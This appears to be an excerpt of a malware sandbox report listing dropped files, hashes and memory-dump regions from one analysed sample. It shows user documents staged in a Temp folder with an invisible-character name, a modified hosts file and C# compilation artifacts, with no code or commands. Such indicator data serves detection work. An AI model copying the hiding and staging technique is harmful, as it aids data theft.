fac71c7622957fe0773214c7432364d7fc39c5e12250ff9eaaeea4d897564dc7

SHA512
1fb0b8100dffd18c433c4aa97a4f2da76ff6e62e2ef2139edc4f98603ba0bb1c27b310b187b5070cf4e892ffc2d09661a6914defa4509c99b60bcbb50f70f4a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4skkaqyo.5ok.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Desktop\ApproveFormat.xlsx

Filesize
11KB

MD5
403edc8307305eaab17c86c92a028520

SHA1
0a10300042699ead9115469a6fad19f0e62382b5

SHA256
c2fdb440d5ab298b27c7feebaf0c9fa7196b1836d41e2bdb03cfea081180d88c

SHA512
b30e1dd7c107099f91832a398979cdcb0cf016e1e83b989551686a8c005abdaf285c18ccb0656f268eaf5d4d3eed91798e507b456f9f478d023f4b55c0249445

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Desktop\AssertNew.xlsx

Filesize
9KB

MD5
eb02880dd58274154b04f7c50adb4b43

SHA1
ac74b43ac3b5781311acd2eb154aa165d70866a7

SHA256
0434242fc9e7bf387a5b8aaa4a03f9dcd11f27a748c6602f40bfe53e464e2cc5

SHA512
14f5db1e12ea0b855630141fdc788c2bc0a758ad3cbb5b0214ef63fbc7001b9954c3a162460d1d2417906216a177305c9f8537ceb2e70e83381b196bedb9e89f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Desktop\BackupAdd.contact

Filesize
455KB

MD5
bd765277154efe4c61db27db52e83892

SHA1
3d1fb75be598187f6623b942c2415bdf7bc94ec7

SHA256
36dd5ce4a9a03e60debfa8fb69036af79cdd651a6422ce0b8f870070211ae9a0

SHA512
7b2985b88cdf4ffe045745b0c9de8cab8f63ef773e195b0e7b9ed995440ddd581517da8510a79c788d9b179a13e484b78a7c64e98ebb659f69132f938d41417d

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Desktop\StartStop.png

Filesize
399KB

MD5
648ed3976573154ce0afd73060e1a9fd

SHA1
1779d7fe7e49c59c1bd92bf831414e19781d491c

SHA256
a1533eb512618de5cdc4102837190f732099f30359150232964905d25d704300

SHA512
81ef5337bfe5c592324ca2e463c13dde4c10e6a1b82e4fd0e370369297fddc88ac531a10e85bd7f18613aef8b348be71f988f642409a00079d9b4bcaed9031aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Desktop\StopSwitch.xlsx

Filesize
11KB

MD5
2e2fe6f6187e7b4d91903c1193edbf69

SHA1
5b2140c10880aae0f5187317a6ec25202a9ce726

SHA256
1f2f332aed617ae495be31757b9a904832e07729665ba4ad1fca0db3f88c62e6

SHA512
df8781d6342426704d6d836f6712b2cc039162e99b2843d018baa5dd853d7c40af04396b9c7b0e4c4325ee86770867122a96d0cb4ddd331d154c904f4d8c789a

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Documents\BackupReset.xps

Filesize
736KB

MD5
4dcfe0a93db3851c5d041636068e4734

SHA1
fdbd0f32129738617a534a3e611a3a94d7c4e1d5

SHA256
9e6f752f92dfde9acfef9e937eb026528a77a345c9fa20418c44ced9d10ab55b

SHA512
ba6d366b7ac201d7b564cf0f90178c4b5db64483568d054109f60321b707006df4f03584e447819bbd399e18f83cd6be9c3941ea1624350819d2969bcb56e22f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Documents\InstallConfirm.docx

Filesize
15KB

MD5
5c63dc57fcf4da30e20b58fdf5411bb0

SHA1
8b145f86bfb96103a6c942e8fa7b06bb64423714

SHA256
903c560f031ec0a974555ceb5f1be4b475e164bb418f3081de5b00ac8ffa0092

SHA512
6ed2738cd02bee322bb792d73871edea2752f93cb55d1326278fba9c0eefd16ee475ed09cf11d1a46095b6fecc914cb8b9f8c35c61f66d7b10d634820e1873a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Documents\InstallLimit.xlsx

Filesize
1.4MB

MD5
3d988d0a466b33b82e8dba49cea3b4c4

SHA1
30fd581e211befb186376cf3f738b6b38e9c811e

SHA256
35cd60bd84c282c9f1fac5cf92b8a2ac8145cf07ab04b1694e07df2baa326932

SHA512
1df36f19a8af7732a7b84213406905f76b26a6e99fca21fec56e8802d5fc318a5e579bad0650015605d0f2dccd7b858a5868b542a7a5d61157ecc545f3af44e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Documents\OutAssert.xlsx

Filesize
10KB

MD5
473bdb6cc61008ae3a108af5f6296e9c

SHA1
cde677397609a4ac4c543916bbbaa7051b5f133d

SHA256
d1dcdeb874550d5f93a1054a23d039def3c52c83c6f2250f005f9140cca91ecc

SHA512
fbec7c432553a1f1b19ccc2ad7a3b52591cc02e062b237a5e92984b722f9bdc2f53739ea785e85265cdf47695a79607a9e1c3c7d9e640cdf00a807140dda2d76

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Documents\PushSplit.xlsx

Filesize
15KB

MD5
df481115d3a7cbf9cd02197053f7ad2f

SHA1
ad276649684b633cda3ffc48623ab3f713b5ef45

SHA256
560a4a4e6029cccd3e30c95143172a88d6eedb37c39d41ea807b530f2209e763

SHA512
5fc089f542adac59e6e9459c1b615b4d6ce09ae59b9d0175e1012747eb709b15507c453eedee116bb0934fd8d59dcc1dbbcd0f7eb0cbdd26fd55fa98790a774d

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Documents\ReadStep.docx

Filesize
18KB

MD5
04f73506ad61888cc4d82ad8dab2e993

SHA1
aa2e8a4666f8c8cadbbca11469c57b6a6a3a66a5

SHA256
c15e11c1d6d97aeeaf13a80ebf2c38d66816c97f4f2c1ef361baca5d8e6ec5b1

SHA512
6a0427c84b6289c53ceaa64cd7aba628b5a40bb0244a2436688964f5e1fad2f7b8d34f5c88e6a08826f40eaffa47edc2bd6081e521d41902f2acee2340f33b54

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏   ‍  \Common Files\Documents\RedoAssert.xls

Filesize
688KB

MD5
7c8fe5b643fe9ad5ff0c6d4ce6411a6a

SHA1
71ca886a3bf0eee07a7d4ed59d1d7b458b640d57

SHA256
5b6e2be1e1f6a3c753e2cd2383aade5d4267e96b80488887348ce420998c3feb

SHA512
86b1279466cdd8af584722fea9d8a5ae6bb6318b20cc3081059b64d3719e654b173be86600b2096b59c599015aa64104f0b95422bb2f5768e48009d764445ee2

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4vu5fucv\4vu5fucv.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4vu5fucv\4vu5fucv.cmdline

Filesize
607B

MD5
0548834373ff8cf2a0caac3c8cd1a12a

SHA1
bee3fe564559001ed9ce1f29b929c592987c2caa

SHA256
664cdf1009bea5bfeebf750c5a516c3a362fc754f88a2e72ad23c85bbd882610

SHA512
a92e98a4b5a8dc3752fabf0015445936c11ba73a5b549906f050cc00d614756f460191f8dc0e7e57c02709fc37a6bc760041e50550bf16adc425a4ec72d84fb7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4vu5fucv\CSC4A2C13B5A284478B8B494E2BCC25CBB4.TMP

Filesize
652B

MD5
166949c8b137c29e13764aa2e95a5978

SHA1
b9910f9d06d17f92a0a797d8eea6e3811310f6d3

SHA256
45d9733065497748fc48fb6e2d2ddb62359947c44e0750d9fbbecd81df80ce57

SHA512
4fa6eb4337df3ce8903eb7c3decba4d56e00976861648bd47f5e4fd50d2f87fefb825b59b1deca1b27cb800ad76068637c840db6189ff653fc58a9651c6328d5

Download Submit
memory/3032-48-0x00007FFB564A0000-0x00007FFB564AF000-memory.dmp

Filesize
60KB

Download
memory/3032-324-0x00007FFB55070000-0x00007FFB55093000-memory.dmp

Filesize
140KB

Download
memory/3032-111-0x00007FFB55070000-0x00007FFB55093000-memory.dmp

Filesize
140KB

Download
memory/3032-319-0x00007FFB50800000-0x00007FFB50DE9000-memory.dmp

Filesize
5.9MB

Download
memory/3032-70-0x00007FFB50800000-0x00007FFB50DE9000-memory.dmp

Filesize
5.9MB

Download
memory/3032-71-0x00007FFB50EE0000-0x00007FFB50FAD000-memory.dmp

Filesize
820KB

Download
memory/3032-320-0x00007FFB550D0000-0x00007FFB550F3000-memory.dmp

Filesize
140KB

Download
memory/3032-78-0x00007FFB550A0000-0x00007FFB550CD000-memory.dmp

Filesize
180KB

Download
memory/3032-79-0x00007FFB54D90000-0x00007FFB54D9D000-memory.dmp

Filesize
52KB

Download
memory/3032-76-0x00007FFB54130000-0x00007FFB54144000-memory.dmp

Filesize
80KB

Download
memory/3032-73-0x00007FFB3F5D0000-0x00007FFB3FAF2000-memory.dmp

Filesize
5.1MB

Download
memory/3032-253-0x00007FFB54190000-0x00007FFB541A9000-memory.dmp

Filesize
100KB

Download
memory/3032-74-0x00007FFB550D0000-0x00007FFB550F3000-memory.dmp

Filesize
140KB

Download
memory/3032-72-0x0000029A9C7E0000-0x0000029A9CD02000-memory.dmp

Filesize
5.1MB

Download
memory/3032-278-0x00007FFB54150000-0x00007FFB54183000-memory.dmp

Filesize
204KB

Download
memory/3032-64-0x00007FFB56490000-0x00007FFB5649D000-memory.dmp

Filesize
52KB

Download
memory/3032-63-0x00007FFB54190000-0x00007FFB541A9000-memory.dmp

Filesize
100KB

Download
memory/3032-60-0x00007FFB50680000-0x00007FFB507F7000-memory.dmp

Filesize
1.5MB

Download
memory/3032-58-0x00007FFB55070000-0x00007FFB55093000-memory.dmp

Filesize
140KB

Download
memory/3032-56-0x00007FFB56350000-0x00007FFB56369000-memory.dmp

Filesize
100KB

Download
memory/3032-54-0x00007FFB550A0000-0x00007FFB550CD000-memory.dmp

Filesize
180KB

Download
memory/3032-83-0x00007FFB56350000-0x00007FFB56369000-memory.dmp

Filesize
100KB

Download
memory/3032-66-0x00007FFB54150000-0x00007FFB54183000-memory.dmp

Filesize
204KB

Download
memory/3032-182-0x00007FFB50680000-0x00007FFB507F7000-memory.dmp

Filesize
1.5MB

Download
memory/3032-310-0x00007FFB50680000-0x00007FFB507F7000-memory.dmp

Filesize
1.5MB

Download
memory/3032-84-0x00007FFB504A0000-0x00007FFB505BC000-memory.dmp

Filesize
1.1MB

Download
memory/3032-283-0x00007FFB50EE0000-0x00007FFB50FAD000-memory.dmp

Filesize
820KB

Download
memory/3032-284-0x0000029A9C7E0000-0x0000029A9CD02000-memory.dmp

Filesize
5.1MB

Download
memory/3032-294-0x00007FFB3F5D0000-0x00007FFB3FAF2000-memory.dmp

Filesize
5.1MB

Download
memory/3032-305-0x00007FFB550D0000-0x00007FFB550F3000-memory.dmp

Filesize
140KB

Download
memory/3032-318-0x00007FFB504A0000-0x00007FFB505BC000-memory.dmp

Filesize
1.1MB

Download
memory/3032-304-0x00007FFB50800000-0x00007FFB50DE9000-memory.dmp

Filesize
5.9MB

Download
memory/3032-25-0x00007FFB50800000-0x00007FFB50DE9000-memory.dmp

Filesize
5.9MB

Download
memory/3032-327-0x00007FFB56490000-0x00007FFB5649D000-memory.dmp

Filesize
52KB

Download
memory/3032-335-0x00007FFB54150000-0x00007FFB54183000-memory.dmp

Filesize
204KB

Download
memory/3032-336-0x00007FFB50EE0000-0x00007FFB50FAD000-memory.dmp

Filesize
820KB

Download
memory/3032-334-0x00007FFB3F5D0000-0x00007FFB3FAF2000-memory.dmp

Filesize
5.1MB

Download
memory/3032-333-0x00007FFB504A0000-0x00007FFB505BC000-memory.dmp

Filesize
1.1MB

Download
memory/3032-332-0x00007FFB54D90000-0x00007FFB54D9D000-memory.dmp

Filesize
52KB

Download
memory/3032-331-0x00007FFB54130000-0x00007FFB54144000-memory.dmp

Filesize
80KB

Download
memory/3032-326-0x00007FFB54190000-0x00007FFB541A9000-memory.dmp

Filesize
100KB

Download
memory/3032-325-0x00007FFB50680000-0x00007FFB507F7000-memory.dmp

Filesize
1.5MB

Download
memory/3032-30-0x00007FFB550D0000-0x00007FFB550F3000-memory.dmp

Filesize
140KB

Download
memory/3032-323-0x00007FFB56350000-0x00007FFB56369000-memory.dmp

Filesize
100KB

Download
memory/3032-322-0x00007FFB550A0000-0x00007FFB550CD000-memory.dmp

Filesize
180KB

Download
memory/3032-321-0x00007FFB564A0000-0x00007FFB564AF000-memory.dmp

Filesize
60KB

Download
memory/3036-193-0x000001BCFA800000-0x000001BCFA808000-memory.dmp

Filesize
32KB

Download
memory/5008-94-0x000001E4FE3A0000-0x000001E4FE3C2000-memory.dmp

Filesize
136KB

Download